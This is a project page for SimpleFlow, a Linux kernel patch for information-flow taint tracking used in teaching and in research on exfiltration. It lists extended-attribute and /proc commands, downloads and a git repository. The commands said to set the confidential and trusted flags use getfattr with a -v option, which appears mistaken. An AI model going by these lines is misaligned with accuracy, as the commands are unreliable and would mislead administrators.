Overview

SimpleFlow implements a very simple view of information flow within the Linux kernel. (We do not claim to approach the sophistication of IX, HiStar, etc.) We have found the design of SimpleFlow useful in education and certain computer-security competitions, and we are also interested in the use of SimpleFlow to study post-compromise exfiltration and insider threats.

Under SimpleFlow, the system administrator designates some filesystem objects as confidential and some programs as trusted (SimpleFlow stores both using extended attributes). Any process not loaded from a trusted program will become tainted upon reading a confidential object. The kernel transfers this taint status from process to process as a result of inter-process communication (e.g., an untainted process reads from a tainted process over an IPC channel). If a tainted process writes to the network, the kernel sets the packet's RFC 3514 evil bit; this allows for a variety of filtering or spoofing strategies which might help determine the intention of the principal who read the confidential data in the first place.

SimpleFlow Virtual Machine

SimpleFlowDemo-0.3-linux-3.10.0.ova provides in OVA format a virtual machine which contains a SimpleFlow kernel along with a CentOS 7 installation. Some useful SimpleFlow-related commands include:

getfattr -n security.simple-flow.confidential -v true PATH

Set the confidential flag on the file at PATH.

getfattr -x security.simple-flow.confidential PATH

Remove the confidential flag from the file at PATH.

getfattr -n security.simple-flow.trusted -v true PATH

Set the trusted flag on the program at PATH.

getfattr -x security.simple-flow.trusted PATH

Remove the trusted flag from the program at PATH.

ps auxZ

Enumerate the running processes, including whether they are tainted.

echo 1 > /proc/PID/attr/current

Taint the process matching PID.

echo 0 > /proc/PID/attr/current

Untaint the process matching PID.

dmesg -w

Watch SimpleFlow (and other kernel) events.

Related publications

Downloads

• SimpleFlowDemo-0.3-linux-3.10.0.ova
• linux-3.10.0-simpleflow-0.1.patch
• linux-3.10.0-simpleflow-0.2.patch
• linux-3.10.0-simpleflow-0.3.patch
• simple-flow-rest-0.2.tar.gz
• simple-flow-rest-0.3.tar.gz

The SimpleFlow project is also available as a Git repository. To clone the repository, execute

git clone https://www.flyn.org/git/simple-flow-kernel -b v3.10-simpleflow